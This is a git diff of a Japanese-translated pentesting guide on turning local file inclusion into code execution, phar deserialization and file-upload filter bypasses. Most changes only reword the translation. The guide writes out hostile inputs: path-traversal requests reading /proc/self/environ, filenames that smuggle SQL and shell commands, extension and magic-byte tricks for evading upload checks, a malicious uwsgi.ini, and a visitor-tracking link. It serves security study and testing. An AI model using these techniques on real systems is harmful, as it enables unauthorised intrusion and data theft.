-ApacheまたはNginxサーバーが**LFIに対して脆弱**である場合、インクルード関数内で**`/var/log/apache2/access.log`または`/var/log/nginx/access.log`**にアクセスし、**ユーザーエージェント**または**GETパラメータ**内に**``**のようなphpシェルを設定し、そのファイルをインクルードしようとすることができます。
+ApacheまたはNginxサーバーが**LFIに脆弱**である場合、インクルード関数内で**`/var/log/apache2/access.log`または`/var/log/nginx/access.log`**にアクセスし、**ユーザーエージェント**または**GETパラメータ**内に**``**のようなphpシェルを設定し、そのファイルをインクルードしようとすることができます。
 
 > [!WARNING]
-> シェルに**シングルクォート**の代わりに**ダブルクォート**を使用すると、ダブルクォートは文字列"_**quote;**_"に変更され、**PHPはエラーをスロー**し、**他の何も実行されません**。
+> シェルに**シングルクォート**の代わりに**ダブルクォート**を使用すると、ダブルクォートが文字列"_**quote;**_"に変更され、**PHPはエラーをスロー**し、**他の何も実行されません**。
 >
 > また、**ペイロードを正しく記述する**ことを確認してください。そうしないと、PHPはログファイルを読み込もうとするたびにエラーを出し、二度と機会がありません。
 
-他のログでもこれを行うことができますが、**注意してください。**ログ内のコードはURLエンコードされている可能性があり、これがシェルを破壊する可能性があります。ヘッダー**認証 "basic"**には、Base64でエンコードされた"user:password"が含まれており、ログ内でデコードされます。PHPShellはこのヘッダー内に挿入できます。\
+他のログでもこれを行うことができますが、**注意してください。** ログ内のコードはURLエンコードされている可能性があり、これがシェルを破壊する可能性があります。ヘッダー**認証 "basic"**には、Base64でエンコードされた"user:password"が含まれており、ログ内でデコードされます。PHPShellはこのヘッダー内に挿入できます。\
 他の可能なログパス:
 ```python
 /var/log/apache2/access.log
@@ -498,7 +500,7 @@ Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzin
 
 ### Via Email
 
-**内部アカウント (user@localhost) にメールを送信**し、``のようなPHPペイロードを含め、**`/var/mail/`**または**`/var/spool/mail/`**のようなパスでユーザーのメールに含めてみてください。
+**内部アカウント(user@localhost)にメールを送信**し、``のようなPHPペイロードを含め、**`/var/mail/`**または**`/var/spool/mail/`**のようなパスでユーザーのメールに含めてみてください。
 
 ### Via /proc/\*/fd/\*
 
@@ -512,9 +514,9 @@ Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzin
 GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
 User-Agent: 
 ```
-### アップロード経由
+### Via upload
 
-ファイルをアップロードできる場合は、その中にシェルペイロードを注入してください(例: `` )。
+ファイルをアップロードできる場合は、そこにシェルペイロードを注入してください(例: `` )。
 ```
 http://example.com/index.php?page=path/to/uploaded/file.png
 ```
@@ -575,7 +577,7 @@ lfi2rce-via-php-filters.md
 
 ### Via segmentation fault
 
-**ファイルをアップロード**し、それが`/tmp`に**一時的に**保存されるようにします。その後、**同じリクエストで、** **セグメンテーションフォルト**を引き起こすと、**一時ファイルは削除されず**、それを検索できます。
+**ファイルをアップロード**し、それが`/tmp`に**一時的に**保存されるようにします。その後、**同じリクエスト内で**、**セグメンテーションフォルト**を引き起こすと、**一時ファイルが削除されず**、それを検索できます。
 
 {{#ref}}
 lfi2rce-via-segmentation-fault.md
@@ -591,7 +593,7 @@ lfi2rce-via-nginx-temp-files.md
 
 ### Via PHP_SESSION_UPLOAD_PROGRESS
 
-**ローカルファイルインクルージョン**を見つけた場合、**セッションがない**場合でも、`session.auto_start`が`Off`であっても、**`PHP_SESSION_UPLOAD_PROGRESS`**を**マルチパートPOST**データに提供すると、PHPは**セッションを有効にします**。これを悪用してRCEを取得できます:
+**ローカルファイルインクルージョン**を見つけた場合、**セッションがない**場合でも、`session.auto_start`が`Off`であっても、**`PHP_SESSION_UPLOAD_PROGRESS`**を**multipart POST**データに提供すると、PHPは**セッションを有効にします**。これを悪用してRCEを取得できます:
 
 {{#ref}}
 via-php_session_upload_progress.md
@@ -607,7 +609,7 @@ lfi2rce-via-temp-file-uploads.md
 
 ### Via `pearcmd.php` + URL args
 
-[**この投稿で説明されているように**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp)、スクリプト`/usr/local/lib/phppearcmd.php`は、phpのdockerイメージにデフォルトで存在します。さらに、URLを介してスクリプトに引数を渡すことが可能で、URLパラメータに`=`がない場合、それを引数として使用する必要があると示されています。
+[**この投稿で説明されているように**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp)、スクリプト`/usr/local/lib/phppearcmd.php`は、phpのdockerイメージにデフォルトで存在します。さらに、URLを介してスクリプトに引数を渡すことが可能で、URLパラメータに`=`がない場合、それを引数として使用する必要があることが示されています。
 
 次のリクエストは、`/tmp/hello.php`に``という内容のファイルを作成します:
 ```bash
@@ -622,7 +624,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php
 ```
 ### phpinfo()を介して (file_uploads = on)
 
-**Local File Inclusion**を発見し、file_uploads = onの**phpinfo()**を公開しているファイルがある場合、RCEを取得できます:
+**Local File Inclusion**を見つけ、file_uploads = onの**phpinfo()**を公開しているファイルがあれば、RCEを取得できます:
 
 {{#ref}}
 lfi2rce-via-phpinfo.md
@@ -630,7 +632,7 @@ lfi2rce-via-phpinfo.md
 
 ### compress.zlib + `PHP_STREAM_PREFER_STUDIO` + パス開示を介して
 
-**Local File Inclusion**を発見し、**一時ファイルのパスを外部に流出させることができるが、**サーバーが**含めるファイルにPHPマークがあるかどうかを**チェックしている**場合、この**レースコンディション**を使って**そのチェックをバイパス**しようとすることができます:
+**Local File Inclusion**を見つけ、**一時ファイルのパスを外部に流出させることができるが、**サーバーが**含めるファイルにPHPマークがあるかどうかを**チェックしている場合、**この**レースコンディション**を使って**そのチェックをバイパス**しようとすることができます:
 
 {{#ref}}
 lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -638,7 +640,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
 
 ### 永遠の待機 + ブルートフォースを介して
 
-LFIを悪用して**一時ファイルをアップロード**し、サーバーがPHP実行を**ハング**させることができる場合、**数時間にわたってファイル名をブルートフォース**して一時ファイルを見つけることができます:
+LFIを悪用して**一時ファイルをアップロード**し、サーバーがPHP実行を**ハング**させることができれば、**数時間にわたってファイル名をブルートフォース**して一時ファイルを見つけることができます:
 
 {{#ref}}
 lfi2rce-via-eternal-waiting.md
@@ -649,7 +651,7 @@ lfi2rce-via-eternal-waiting.md
 `/usr/bin/phar`、`/usr/bin/phar7`、`/usr/bin/phar.phar7`、`/usr/bin/phar.phar`のいずれかのファイルを含めると、致命的エラーが発生します。(そのエラーを引き起こすには、同じファイルを2回含める必要があります)。
 
 **これがどのように役立つのかはわかりませんが、役立つかもしれません。**\
-_たとえPHPの致命的エラーを引き起こしても、アップロードされたPHPの一時ファイルは削除されます。_
+_PHPの致命的エラーを引き起こしても、アップロードされたPHPの一時ファイルは削除されます。_
 
 

 
@@ -657,7 +659,7 @@ _たとえPHPの致命的エラーを引き起こしても、アップロード
 
 - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
 - [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
-- [Horizon3.ai – サポートチケットからゼロデイへ (FreeFlow Coreパストラバーサル → 任意の書き込み → ウェブシェル)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
+- [Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
 - [Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
 
 {{#file}}
diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md
index 66c4d84cb..c7ccd72f9 100644
--- a/src/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/src/pentesting-web/file-inclusion/phar-deserialization.md
@@ -1,12 +1,12 @@
-# phar:// デシリアライズ
+# phar:// deserialization
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Phar** ファイル (PHP アーカイブ) は **シリアライズ形式のメタデータ** を含んでいるため、解析されるとこの **メタデータ** は **デシリアライズ** され、**PHP** コード内の **デシリアライズ** 脆弱性を悪用することができます。
+**Phar**ファイル(PHPアーカイブ)ファイルは**シリアライズ形式のメタデータ**を含んでいるため、解析されるとこの**メタデータ**は**デシリアライズ**され、**PHP**コード内の**デシリアライズ**脆弱性を悪用することができます。
 
-この特性の最も良い点は、**file_get_contents()、fopen()、file() または file_exists()、md5_file()、filemtime() または filesize()** のような PHP コードを評価しない関数を使用しても、このデシリアライズが発生することです。
+この特性の最も良い点は、**file_get_contents()、fopen()、file()、file_exists()、md5_file()、filemtime()、filesize()**のようなPHPコードを評価しない関数を使用しても、このデシリアライズが発生することです。
 
-したがって、任意のファイルのサイズを **`phar://`** プロトコルを使用して取得する PHP ウェブがある状況を想像してみてください。そして、コード内に次のような **クラス** が見つかります:
+したがって、任意のファイルのサイズを取得するPHPウェブが**`phar://`**プロトコルを使用して任意のファイルのサイズを取得できる状況を想像してみてください。そして、コード内に次のような**クラス**が見つかります:
 ```php:vunl.php
 data);
 
 filesize("phar://test.phar"); #The attacker can control this path
 ```
-あなたは、読み込まれるとこのクラスを悪用して任意のコマンドを実行する**phar**ファイルを作成できます。
+あなたは、読み込まれたときにこのクラスを悪用して任意のコマンドを実行する**phar**ファイルを作成できます。例えば:
 ```php:create_phar.php
 setMetadata($object);
 $phar->stopBuffering();
 ```
-注意してください、**JPGのマジックバイト**(`\xff\xd8\xff`)がpharファイルの先頭に追加されて、**可能な**ファイル**アップロード**の**制限**を**回避**するために使用されます。\
-`test.phar`ファイルを次のようにコンパイルします:
+注意してください、**JPGのマジックバイト**(`\xff\xd8\xff`)がpharファイルの先頭に追加されて、**可能な**ファイル**アップロード**の**制限**を**回避**します。\
+`test.phar`ファイルを次のように**コンパイル**します:
 ```bash
 php --define phar.readonly=0 create_phar.php
 ```
@@ -59,6 +59,7 @@ php vuln.php
 ```
 ### 参考文献
 
+
 {{#ref}}
 https://blog.ripstech.com/2018/new-php-exploitation-technique/
 {{#endref}}
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index a31161ab6..ebe37a16b 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -17,11 +17,11 @@
 
 ### ファイル拡張子チェックのバイパス
 
-1. 適用される場合、**以前の拡張子をチェック**します。また、いくつかの**大文字**を使用してテストします: _pHp, .pHP5, .PhAr ..._
-2. _実行拡張子の前に**有効な拡張子を追加**してチェックします(以前の拡張子も使用):_
+1. 適用される場合、**前の拡張子をチェック**します。また、いくつかの**大文字**を使用してテストします: _pHp, .pHP5, .PhAr ..._
+2. _実行拡張子の前に**有効な拡張子を追加**してチェックします(前の拡張子も使用):_
 - _file.png.php_
 - _file.png.Php5_
-3. **特殊文字を末尾に追加**してみてください。Burpを使用してすべての**ascii**および**Unicode**文字を**ブルートフォース**することができます。 (_以前に言及した**拡張子**を使用することもできます_)
+3. **特殊文字を末尾に追加**してみてください。Burpを使用してすべての**ascii**および**Unicode**文字を**ブルートフォース**することができます。 (_前述の**拡張子**を使用してより良いペイロードを準備することもできます_)
 - _file.php%20_
 - _file.php%0a_
 - _file.php%00_
@@ -31,7 +31,7 @@
 - _file._
 - _file.php...._
 - _file.pHp5...._
-4. **サーバー側の拡張子パーサーをだまして**保護をバイパスしてみてください。**拡張子を二重にする**か、**ジャンク**データ(**null**バイト)を拡張子の間に追加します。 _より良いペイロードを準備するために**以前の拡張子**を使用することもできます。_
+4. **サーバー側の拡張子パーサーをだまして**保護をバイパスしてみてください。**拡張子を二重にする**か、**ジャンク**データ(**null**バイト)を拡張子の間に追加します。 _前述の**拡張子**を使用してより良いペイロードを準備することもできます。_
 - _file.png.php_
 - _file.png.pHp5_
 - _file.php#.png_
@@ -40,18 +40,18 @@
 - _file.php%0a.png_
 - _file.php%0d%0a.png_
 - _file.phpJunk123png_
-5. **前のチェックに別の拡張子の層を追加**します:
+5. 前のチェックに**別の拡張子の層を追加**します:
 - _file.png.jpg.php_
 - _file.php%00.png%00.jpg_
-6. **有効な拡張子の前にexec拡張子を置き**、サーバーが誤って設定されていることを祈ります。(**.php**で終わらないが、**.php**拡張子を持つものはすべてコードを実行するApacheの誤設定を悪用するのに便利です):
+6. **有効な拡張子の前にexec拡張子を置き**、サーバーが誤って設定されていることを祈ります。(**.php**で終わらないが、**.php**拡張子を持つものはすべてコードを実行するApacheの誤設定を悪用するのに役立ちます):
 - _例: file.php.png_
-7. **Windows**での**NTFS代替データストリーム(ADS)**を使用します。この場合、禁止された拡張子の後と許可された拡張子の前にコロン文字「:」が挿入されます。その結果、サーバー上に**禁止された拡張子を持つ空のファイル**が作成されます(例: “file.asax:.jpg”)。このファイルは、他の技術を使用して後で編集することができます。 “**::$data**”パターンを使用して非空のファイルを作成することもできます。したがって、このパターンの後にドット文字を追加することも、さらなる制限をバイパスするのに役立ちます(例: “file.asp::$data.”)
+7. **Windows**の**NTFS代替データストリーム(ADS)**を使用します。この場合、禁止された拡張子の後と許可された拡張子の前にコロン文字「:」が挿入されます。その結果、サーバー上に**禁止された拡張子を持つ空のファイル**が作成されます(例: “file.asax:.jpg”)。このファイルは、他の技術を使用して後で編集することができます。 “**::$data**”パターンを使用して非空のファイルを作成することもできます。したがって、このパターンの後にドット文字を追加することも、さらなる制限をバイパスするのに役立ちます(例: “file.asp::$data.”)
 8. ファイル名の制限を破ることを試みます。有効な拡張子が切り捨てられ、悪意のあるPHPが残ります。 AAA<--SNIP-->AAA.php
 
 ```
 # Linuxの最大255バイト
 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
-Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # ここで4を引き、.pngを追加
+Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # ここから4を引いて.pngを追加
 # ファイルをアップロードし、どれだけの文字を許可するか応答を確認します。236としましょう
 python -c 'print "A" * 232'
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@@ -65,13 +65,13 @@ AAA<--SNIP 232 A-->AAA.php.png
 1. Content-Type **ワードリスト**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
 - ファイルの先頭に**実際の画像のバイト**を追加して**マジックナンバー**チェックをバイパスします(_file_コマンドを混乱させます)。または、**メタデータ**内にシェルを挿入します:\
 `exiftool -Comment="' >> img.png`
-- 画像に**圧縮が追加されている**場合、たとえば、[PHP-GD](https://www.php.net/manual/fr/book.image.php)のような標準のPHPライブラリを使用している場合、前述の技術は役に立ちません。ただし、**PLTEチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮に耐えるテキストを挿入できます。
+- 画像に**圧縮が追加されている**場合、たとえば、[PHP-GD](https://www.php.net/manual/fr/book.image.php)のような標準のPHPライブラリを使用している場合、前述の技術は役に立ちません。しかし、**PLTEチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮を生き残るテキストを挿入することができます。
 - [**コードのあるGithub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
-- ウェブページが画像を**リサイズ**している可能性もあります。たとえば、PHP-GD関数`imagecopyresized`または`imagecopyresampled`を使用しています。ただし、**IDATチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮に耐えるテキストを挿入できます。
+- ウェブページが画像を**リサイズ**している場合、たとえば、PHP-GD関数`imagecopyresized`または`imagecopyresampled`を使用している場合、前述の技術は役に立ちません。しかし、**IDATチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮を生き残るテキストを挿入することができます。
 - [**コードのあるGithub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
-- 画像のリサイズに耐えるペイロードを作成する別の技術として、PHP-GD関数`thumbnailImage`を使用します。ただし、**tEXtチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮に耐えるテキストを挿入できます。
+- 画像の**リサイズを生き残る**ペイロードを作成する別の技術として、PHP-GD関数`thumbnailImage`を使用します。しかし、**tEXtチャンク** [**ここで定義された技術**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)を使用して、圧縮を生き残るテキストを挿入することができます。
 - [**コードのあるGithub**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
 
 ### その他のチェックするトリック
@@ -81,24 +81,24 @@ AAA<--SNIP 232 A-->AAA.php.png
 - **情報漏洩の可能性**:
 1. **同じファイル**を**同時に**何度もアップロードします。
 2. **既存のファイル**または**フォルダ**の**名前**でファイルをアップロードします。
-3. **“.”、 “..”、または “…”**を名前に持つファイルをアップロードします。たとえば、Apacheの**Windows**では、アプリケーションがアップロードされたファイルを「/www/uploads/」ディレクトリに保存する場合、「.」というファイル名は「/www/」ディレクトリに「uploads」というファイルを作成します。
+3. **“.”, “..”, または “…”**を名前に持つファイルをアップロードします。たとえば、Apacheの**Windows**では、アプリケーションがアップロードされたファイルを「/www/uploads/」ディレクトリに保存する場合、「.」というファイル名は「/www/」ディレクトリに「uploads」というファイルを作成します。
 4. **NTFS**で簡単に削除できないファイル(例: **“…:.jpg”**)をアップロードします。(Windows)
-5. **無効な文字**(例: `|<>*?”`)を名前に持つファイルを**Windows**にアップロードします。(Windows)
-6. **予約された**(**禁止された**)**名前**(例: CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9)を持つファイルを**Windows**にアップロードします。
-- **実行可能ファイル**(.exe)または**.html**(あまり疑わしくない)をアップロードして、被害者が誤って開いたときに**コードを実行**させることも試みてください。
+5. **Windows**で**無効な文字**(例: `|<>*?”`)を名前に持つファイルをアップロードします。(Windows)
+6. **Windows**で**予約された**(**禁止された**)**名前**(例: CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9)を使用してファイルをアップロードします。
+- また、**実行可能ファイル**(.exe)や**.html**(あまり疑わしくない)をアップロードして、被害者が誤って開いたときに**コードを実行**させることを試みます。
 
 ### 特殊な拡張子のトリック
 
-**PHPサーバー**にファイルをアップロードしようとしている場合は、[コードを実行するための**.htaccess**トリックを確認してください](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution)。\
-**ASPサーバー**にファイルをアップロードしようとしている場合は、[コードを実行するための**.config**トリックを確認してください](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
+**PHPサーバー**にファイルをアップロードしようとしている場合、[コードを実行するための**.htaccess**トリックを確認してください](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution)。\
+**ASPサーバー**にファイルをアップロードしようとしている場合、[コードを実行するための**.config**トリックを確認してください](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
 
-`.phar`ファイルはJavaの`.jar`のようなもので、PHP用であり、**PHPファイルのように使用**できます(PHPで実行したり、スクリプト内に含めたりできます...)
+`.phar`ファイルはJavaの`.jar`のようなもので、PHP用であり、**PHPファイルのように使用**できます(PHPで実行したり、スクリプト内に含めたりすることができます...)
 
-`.inc`拡張子は、ファイルを**インポートするためだけに使用される**PHPファイルに時々使用されるため、ある時点で誰かが**この拡張子を実行可能にした**可能性があります。
+`.inc`拡張子は、時々、ファイルを**インポートするためだけに使用されるPHPファイルに使用されるため、誰かが**この拡張子を実行可能にすることを許可した可能性があります。
 
 ## **Jetty RCE**
 
-JettyサーバーにXMLファイルをアップロードできる場合、[**新しい \*.xml および \*.war が自動的に処理されるため**RCEを取得できます](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**。** 次の画像に示すように、XMLファイルを`$JETTY_BASE/webapps/`にアップロードし、シェルを期待してください!
+JettyサーバーにXMLファイルをアップロードできる場合、[**新しい\*.xmlおよび\*.warが自動的に処理されるため**RCEを取得できます](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**。** 次の画像に示すように、XMLファイルを`$JETTY_BASE/webapps/`にアップロードし、シェルを期待してください!
 
 ![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
 
@@ -106,7 +106,7 @@ JettyサーバーにXMLファイルをアップロードできる場合、[**新
 
 この脆弱性の詳細な調査については、元の研究を確認してください: [uWSGI RCEの悪用](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)。
 
-リモートコマンド実行(RCE)脆弱性は、`.ini`構成ファイルを変更する能力がある場合、uWSGIサーバーで悪用できます。uWSGI構成ファイルは、"magic"変数、プレースホルダー、および演算子を組み込むために特定の構文を利用します。特に、`@(filename)`として使用される'@'演算子は、ファイルの内容を含めるために設計されています。uWSGIでサポートされているさまざまなスキームの中で、"exec"スキームは特に強力で、プロセスの標準出力からデータを読み取ることを可能にします。この機能は、`.ini`構成ファイルが処理されるときに、リモートコマンド実行や任意のファイルの書き込み/読み取りなどの悪意のある目的に操作できます。
+リモートコマンド実行(RCE)脆弱性は、`.ini`構成ファイルを変更する能力がある場合、uWSGIサーバーで悪用できます。uWSGI構成ファイルは、"magic"変数、プレースホルダー、および演算子を組み込むために特定の構文を利用します。特に、`@(filename)`として使用される'@'演算子は、ファイルの内容を含めるために設計されています。uWSGIでサポートされているさまざまなスキームの中で、"exec"スキームは特に強力で、プロセスの標準出力からデータを読み取ることを可能にします。この機能は、`.ini`構成ファイルが処理されるときに、リモートコマンド実行や任意のファイルの書き込み/読み取りなどの悪意のある目的に悪用される可能性があります。
 
 以下は、さまざまなスキームを示す有害な`uwsgi.ini`ファイルの例です:
 ```ini
@@ -128,7 +128,7 @@ characters = @(call://uwsgi_func)
 ```
 ペイロードの実行は、設定ファイルの解析中に発生します。設定が有効化され、解析されるためには、uWSGIプロセスを再起動する必要があります(クラッシュ後やサービス拒否攻撃のために)またはファイルを自動再読み込みに設定する必要があります。自動再読み込み機能が有効になっている場合、変更を検出すると指定された間隔でファイルが再読み込みされます。
 
-uWSGIの設定ファイル解析の緩い性質を理解することが重要です。具体的には、議論されたペイロードはバイナリファイル(画像やPDFなど)に挿入でき、潜在的な悪用の範囲をさらに広げます。
+uWSGIの設定ファイル解析の緩い性質を理解することが重要です。具体的には、議論されたペイロードはバイナリファイル(画像やPDFなど)に挿入でき、潜在的な悪用の範囲をさらに広げることができます。
 
 ## **wget File Upload/SSRF Trick**
 
@@ -164,21 +164,21 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 
 ## ファイルアップロードから他の脆弱性へ
 
-- **filename** を `../../../tmp/lol.png` に設定して、**パストラバーサル**を試みます。
-- **filename** を `sleep(10)-- -.jpg` に設定すると、**SQLインジェクション**を達成できるかもしれません。
-- **filename** を `` に設定して、XSSを達成します。
-- **filename** を `; sleep 10;` に設定して、いくつかのコマンドインジェクションをテストします(詳細な [コマンドインジェクションのトリックはこちら](../command-injection.md))。
+- **filename**を`../../../tmp/lol.png`に設定して**パストラバーサル**を試みる
+- **filename**を`sleep(10)-- -.jpg`に設定すると、**SQLインジェクション**を達成できるかもしれません
+- **filename**を``に設定してXSSを達成する
+- **filename**を`; sleep 10;`に設定してコマンドインジェクションをテストする(詳細な[コマンドインジェクションのトリックはこちら](../command-injection.md))
 - [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
-- **JS**ファイル **アップロード** + **XSS** = [**Service Workers**の悪用](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
+- **JS**ファイル**アップロード** + **XSS** = [**Service Workers**の悪用](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
 - [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
 - [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
-- [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet) から **異なるsvgペイロード**を試してください。
-- [有名な **ImageTrick** 脆弱性](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
-- **URLから画像を取得するようにWebサーバーを指示できる**場合、[SSRF](../ssrf-server-side-request-forgery/index.html)を悪用することを試みることができます。この**画像**が**公開**サイトに**保存**される場合、[https://iplogger.org/invisible/](https://iplogger.org/invisible/) からのURLを指定して、**すべての訪問者の情報を盗む**こともできます。
-- [**XXEとCORS**のバイパスをPDF-Adobeアップロードで](pdf-upload-xxe-and-cors-bypass.md)
-- 特別に作成されたPDFを使用したXSS: [以下のページでは、**PDFデータを注入してJS実行を取得する方法**を示しています](../xss-cross-site-scripting/pdf-injection.md)。PDFをアップロードできる場合、指定された指示に従って任意のJSを実行するPDFを準備できます。
-- \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt))の内容をアップロードして、サーバーに**ウイルス対策ソフト**があるかどうかを確認します。
-- ファイルをアップロードする際に**サイズ制限**があるかどうかを確認します。
+- [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)から**異なるsvgペイロード**を試す
+- [有名な**ImageTrick**脆弱性](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
+- **URLから画像を取得するようにWebサーバーを指示できる**場合、[SSRF](../ssrf-server-side-request-forgery/index.html)を悪用することを試みることができます。この**画像**が**公開**サイトに**保存**される場合、[https://iplogger.org/invisible/](https://iplogger.org/invisible/)からのURLを指定して、**すべての訪問者の情報を盗む**こともできます。
+- [**XXEとCORS**バイパス with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
+- 特別に作成されたPDFでXSS: [次のページでは、**PDFデータを注入してJS実行を取得する方法**を示しています](../xss-cross-site-scripting/pdf-injection.md)。PDFをアップロードできる場合、与えられた指示に従って任意のJSを実行するPDFを準備できます。
+- \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt))の内容をアップロードして、サーバーに**ウイルス対策ソフト**があるかどうかを確認します
+- ファイルをアップロードする際に**サイズ制限**があるかどうかを確認します
 
 以下は、アップロードによって達成できることのトップ10リストです([こちらから](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
 
@@ -190,7 +190,7 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 6. **AVI**: LFI / SSRF
 7. **HTML / JS** : HTMLインジェクション / XSS / オープンリダイレクト
 8. **PNG / JPEG**: ピクセルフラッド攻撃 (DoS)
-9. **ZIP**: LFIを介したRCE / DoS
+9. **ZIP**: LFI経由のRCE / DoS
 10. **PDF / PPTX**: SSRF / BLIND XXE
 
 #### Burp拡張
@@ -208,11 +208,11 @@ https://github.com/portswigger/upload-scanner
 
 ## Zip/Tarファイルの自動解凍アップロード
 
-サーバー内で解凍されるZIPをアップロードできる場合、2つのことができます。
+サーバー内で解凍されるZIPをアップロードできる場合、2つのことができます:
 
-### シンボリックリンク
+### シンリンク
 
